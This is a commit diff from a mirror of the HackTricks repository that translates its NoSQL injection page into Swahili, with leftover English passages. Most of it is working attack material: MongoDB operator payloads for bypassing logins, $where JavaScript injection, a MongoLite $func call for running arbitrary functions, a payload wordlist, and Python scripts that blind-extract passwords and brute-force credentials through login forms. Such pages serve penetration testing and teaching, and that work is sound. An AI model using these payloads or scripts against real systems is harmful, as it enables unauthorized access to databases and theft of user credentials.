Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['pentesting-web/nosql-injection.md'] to sw

Browse source
This commit is contained in:
Translator 2024-03-03 09:50:53 +00:00
parent 27fd9e1294
commit 93b8f52ed6
1 changed files with 31 additions and 150 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

181
pentesting-web/nosql-injection.md
View file

@ -1,32 +1,33 @@
# Uvamizi wa NoSQL
# Kuingiza NoSQL
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii za **kisasa zaidi** duniani.\
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia** mchakato wa kiotomatiki ulioendeshwa na zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuingiza kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Kutumia udhaifu
## Kutumia
Katika PHP unaweza kutuma safu ya data kwa kubadilisha parameter iliyotumwa kutoka _parameter=foo_ hadi _parameter\[arrName]=foo._
Katika PHP unaweza kutuma Array kwa kubadilisha parameter iliyotumwa kutoka _parameter=foo_ hadi _parameter\[arrName]=foo._
Udhaifu huu unategemea kuongeza **Msimamizi**:
Mbinu za kuingiza zinategemea kuongeza **Msimamizi**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
@ -37,7 +38,7 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### Kupitisha Uthibitishaji wa Msingi
### Kupitisha uthibitisho wa msingi
**Kutumia sio sawa ($ne) au kubwa zaidi ($gt)**
```bash
@ -52,87 +53,21 @@ username[$exists]=true&password[$exists]=true
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
#### **NoSQL Injection**
NoSQL injection is a type of vulnerability that occurs when an attacker is able to manipulate a NoSQL query in order to retrieve unauthorized data or perform unauthorized actions on a NoSQL database.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting a boolean expression into the query in order to determine if a specific condition is true or false. By manipulating the query, an attacker can extract sensitive information from the database.
2. **Time-based Injection**: In this technique, an attacker injects a delay into the query in order to determine if a specific condition is true or false. By measuring the time it takes for the query to execute, an attacker can extract information from the database.
3. **Error-based Injection**: This technique involves injecting a query that causes an error in order to extract information from the error message. By manipulating the query, an attacker can retrieve sensitive data from the database.
4. **Union-based Injection**: In this technique, an attacker injects a query that combines the results of two or more queries into a single result set. By manipulating the query, an attacker can retrieve data from multiple tables in the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection, it is important to follow these best practices:
1. **Input Validation**: Validate and sanitize all user input before using it in a NoSQL query.
2. **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and sanitized.
3. **Least Privilege Principle**: Limit the privileges of the database user used by the application to only what is necessary.
4. **Secure Configuration**: Ensure that the NoSQL database is properly configured and secured to prevent unauthorized access.
By following these best practices, you can significantly reduce the risk of NoSQL injection vulnerabilities in your application.
```javascript
query = { $where: `this.username == '${username}'` }
```
Mshambuliaji anaweza kutumia hili kwa kuingiza maneno kama `admin' || 'a'=='a`, kufanya swali liwarudishie nyaraka zote kwa kuridhisha hali na tautolojia (`'a'=='a'`). Hii inafanana na mashambulizi ya kuingiza SQL ambapo maneno kama `' or 1=1-- -` hutumiwa kudhibiti maswali ya SQL. Katika MongoDB, kuingizwa kama hii inaweza kufanywa kwa kutumia maneno kama `' || 1==1//`, `' || 1==1%00`, au `admin' || 'a'=='a`.
Mshambuliaji anaweza kutumia hili kwa kuingiza maneno kama `admin' || 'a'=='a`, hivyo kufanya swali kurudisha nyaraka zote kwa kutosheleza hali na tautology (`'a'=='a'`). Hii inafanana na mashambulizi ya SQL injection ambapo maneno kama `' or 1=1-- -` hutumika kudhibiti mizunguko ya SQL. Katika MongoDB, mashambulizi sawa yanaweza kufanywa kwa kutumia maneno kama `' || 1==1//`, `' || 1==1%00`, au `admin' || 'a'=='a`.
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
```
### Pata habari ya **urefu** (length)
To extract the length information in a NoSQL injection attack, you can use the `$where` operator in MongoDB or the `regex` operator in other NoSQL databases.
#### MongoDB
In MongoDB, you can use the `$where` operator to execute JavaScript code on the server. By using the `toString()` method on the target field and checking its length, you can extract the length information.
```javascript
db.collection.find({ $where: "this.target.toString().length == 10" })
```
Replace `collection` with the name of the target collection and `target` with the name of the field you want to extract the length from. Adjust the length value (`10` in the example) according to your needs.
#### Other NoSQL Databases
In other NoSQL databases, you can use the `regex` operator to match a regular expression against the target field. By crafting a regular expression that matches a specific length, you can extract the length information.
```javascript
db.collection.find({ field: { $regex: /^.{10}$/ } })
```
Replace `collection` with the name of the target collection, `field` with the name of the field you want to extract the length from, and adjust the length value (`10` in the example) according to your needs.
Remember to test different lengths to find the correct length of the target field.
### Pata habari ya **urefu**
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### Pata habari za **data**
Unaweza kutumia kuvuja kwa NoSQL kuchunguza na kuchota habari za data kutoka kwa programu zinazotumia teknolojia ya NoSQL. Kwa kufanya hivyo, unaweza kupata habari muhimu kama majina ya watumiaji, nywila, anwani za barua pepe, na habari nyingine ya siri.
Kuna njia kadhaa za kufanya hivyo, kulingana na aina ya kuvuja kwa NoSQL inayotumiwa na programu. Hapa kuna mifano ya njia mbili za kawaida:
#### 1. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida
Ikiwa programu inatumia maombi ya kawaida kama `find`, `findOne`, au `aggregate`, unaweza kujaribu kuvuja kwa NoSQL kwa kubadilisha maombi hayo. Kwa mfano, unaweza kujaribu kubadilisha maombi ya kawaida kuwa maombi ya kuvuja kwa NoSQL kwa kuongeza opereta ya kuvuja kama `$ne` (si sawa na) au `$regex` (kutumia kanuni za kawaida).
#### 2. Kuvuja kwa NoSQL kwa kutumia maombi ya kawaida na mchanganyiko wa maombi
Ikiwa programu inatumia mchanganyiko wa maombi ya kawaida, unaweza kujaribu kuvuja kwa NoSQL kwa kuchanganya maombi tofauti. Kwa mfano, unaweza kujaribu kuchanganya maombi ya kawaida na opereta za kuvuja kama `$ne` au `$regex` ili kupata habari ya siri.
Ni muhimu kuelewa muundo wa data na jinsi maombi yanavyofanya kazi ili uweze kubadilisha maombi kwa usahihi na kupata habari unayotafuta.
### Pata habari za **data**
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
@ -151,38 +86,6 @@ in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
### **SQL - Mongo**
MongoDB is a popular NoSQL database that uses a document-oriented model to store data. It is widely used in web applications and offers a flexible and scalable solution for managing large amounts of data.
#### **NoSQL Injection**
NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB, by exploiting vulnerabilities in the application's input validation. This attack allows an attacker to manipulate the database queries and potentially gain unauthorized access to sensitive data.
#### **NoSQL Injection Techniques**
1. **Boolean-based Injection**: This technique involves injecting boolean-based queries to determine if a query is true or false. By manipulating the query, an attacker can extract information from the database.
2. **Time-based Injection**: In this technique, an attacker injects time delays into the query to determine if the injected query is executed. By measuring the response time, an attacker can extract information from the database.
3. **Union-based Injection**: Union-based injection involves injecting queries that combine the results of multiple queries. By manipulating the query, an attacker can extract information from different parts of the database.
4. **Error-based Injection**: Error-based injection involves injecting queries that cause the application to generate an error message. By analyzing the error message, an attacker can extract information from the database.
#### **Preventing NoSQL Injection**
To prevent NoSQL injection attacks, it is important to implement proper input validation and sanitization techniques. Here are some best practices:
- **Input Validation**: Validate and sanitize all user input before using it in database queries.
- **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is properly escaped and treated as data, rather than executable code.
- **Least Privilege Principle**: Limit the privileges of the database user used by the application to minimize the potential impact of an injection attack.
- **Secure Configuration**: Ensure that the database server is properly configured and updated to mitigate known vulnerabilities.
By following these best practices, you can significantly reduce the risk of NoSQL injection attacks and protect your application's data.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
@ -194,9 +97,9 @@ By following these best practices, you can significantly reduce the risk of NoSQ
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
```
### Utekelezaji wa Kazi Isiyohusiana na PHP
### Utekelezaji wa Kazi ya Kiholela ya PHP
Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (inayotumiwa kwa chaguo-msingi), inaweza kuwa inawezekana kutekeleza kazi isiyohusiana kama ilivyo katika [ripoti hii](https://swarm.ptsecurity.com/rce-cockpit-cms/).
Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) (inayotumiwa kwa chaguo-msingi) inaweza kuwa inawezekana kutekeleza kazi ya kiholela kama ilivyo katika [ripoti hii](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
@ -204,7 +107,9 @@ Kwa kutumia operator **$func** wa maktaba ya [MongoLite](https://github.com/agen
### Pata habari kutoka kwa mkusanyiko tofauti
Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa **mkusanyiko tofauti** unaoitwa **`users`** na kupata **matokeo ya kuingia** yote na nenosiri linalolingana na kichujio cha wilcard.
Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) kupata habari kutoka kwa mkusanyiko tofauti. Katika mfano ufuatao, tunasoma kutoka kwa **mkusanyiko tofauti** uitwao **`users`** na kupata **matokeo ya kila kuingia** yenye nenosiri linalolingana na alama ya wilcard.
**TAARIFA:** `$lookup` na kazi nyingine za uagizaji zinapatikana tu ikiwa kazi ya `aggregate()` ilitumika kufanya utafutaji badala ya kazi za kawaida za `find()` au `findOne()`.
```json
[
{
@ -226,12 +131,12 @@ Inawezekana kutumia [**$lookup**](https://www.mongodb.com/docs/manual/reference/
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii **zinazoendelea zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zaidi zinazotumia zana za jamii ya **juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Malipo ya MongoDB
## MongoDB Payloads
Orodha [kutoka hapa](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
@ -264,30 +169,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## Skripti ya Blind NoSQL
### Maelezo
Blind NoSQL Injection ni aina ya shambulio ambapo mtu anajaribu kudhibiti au kupata habari kutoka kwa hifadhidata ya NoSQL. Shambulio hili linategemea udhaifu katika jinsi maombi yanavyoshughulikia maombi ya hifadhidata ya NoSQL.
### Hatua ya 1: Kuchunguza Udhaifu
Kabla ya kuanza shambulio la Blind NoSQL Injection, ni muhimu kuchunguza ikiwa maombi yanayojaribiwa yana udhaifu huu. Unaweza kufanya hivyo kwa kuchunguza majibu ya maombi na kuchunguza ikiwa kuna ishara za udhaifu wa NoSQL Injection.
### Hatua ya 2: Kugundua Muundo wa Hifadhidata
Ili kufanikisha shambulio la Blind NoSQL Injection, unahitaji kugundua muundo wa hifadhidata. Hii inaweza kufanywa kwa kutuma maombi tofauti na kuchunguza majibu ili kubaini muundo wa hifadhidata.
### Hatua ya 3: Kujenga Script ya Blind NoSQL
Baada ya kugundua muundo wa hifadhidata, unaweza kuanza kujenga skripti ya Blind NoSQL Injection. Skripti hii itatumika kudhibiti maombi na kufanya maswali ya NoSQL Injection kwa kutumia mbinu za kipofu.
### Hatua ya 4: Kutekeleza Shambulio
Hatua ya mwisho ni kutekeleza shambulio la Blind NoSQL Injection kwa kutumia skripti iliyoundwa. Shambulio hili linaweza kusababisha kupata habari nyeti kutoka kwa hifadhidata au hata kudhibiti maombi yenyewe.
### Tahadhari
Ni muhimu kutambua kuwa shambulio la Blind NoSQL Injection ni kinyume cha sheria na linaweza kusababisha madhara makubwa. Ni muhimu kufanya shambulio hili tu kwa idhini ya mmiliki wa mfumo unaolengwa na kwa madhumuni ya kujaribu usalama.
```python
import requests, string
@ -323,9 +204,9 @@ if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
### Kuvunja nguvu majina ya mtumiaji na nywila kutoka kwa kuingia POST
### Kuvunja majina ya mtumiaji na nywila kwa kutumia POST login
Hii ni hati rahisi ambayo unaweza kubadilisha lakini zana za awali pia zinaweza kufanya kazi hii.
Hii ni script rahisi ambayo unaweza kuihariri lakini zana za awali zinaweza pia kufanya kazi hii.
```python
import requests
import string
@ -383,18 +264,18 @@ get_password(u)
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia kiotomatiki** mchakato wa kazi ulioendeshwa na zana za jamii za **juu zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za **jamii yenye maendeleo zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}